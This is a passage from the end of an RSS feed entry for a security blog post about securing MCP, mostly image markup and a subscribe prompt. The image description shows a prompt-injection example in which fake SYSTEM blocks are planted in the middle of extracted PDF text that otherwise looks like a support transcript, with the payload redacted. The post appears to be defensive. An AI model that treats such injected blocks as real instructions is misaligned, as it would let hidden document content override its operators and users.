characters.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/188403113?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Code/config screen &#8212; extracted PDF text with line numbers. Lines 1-5 look like a normal support transcript. Lines 7-11 highlighted red: fake SYSTEM blocks injected mid-document, payload redacted with block characters." title="Code/config screen &#8212; extracted PDF text with line numbers. Lines 1-5 look like a normal support transcript. Lines 7-11 highlighted red: fake SYSTEM blocks injected mid-document, payload redacted with block characters." srcset="https://substackcdn.com/image/fetch/$s_!x3wL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 424w, https://substackcdn.com/image/fetch/$s_!x3wL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 848w, https://substackcdn.com/image/fetch/$s_!x3wL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 1272w, https://substackcdn.com/image/fetch/$s_!x3wL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/secure-your-mcp">
              Read more
          </a>
      </p>
   ]]></content:encoded></item></channel></rss>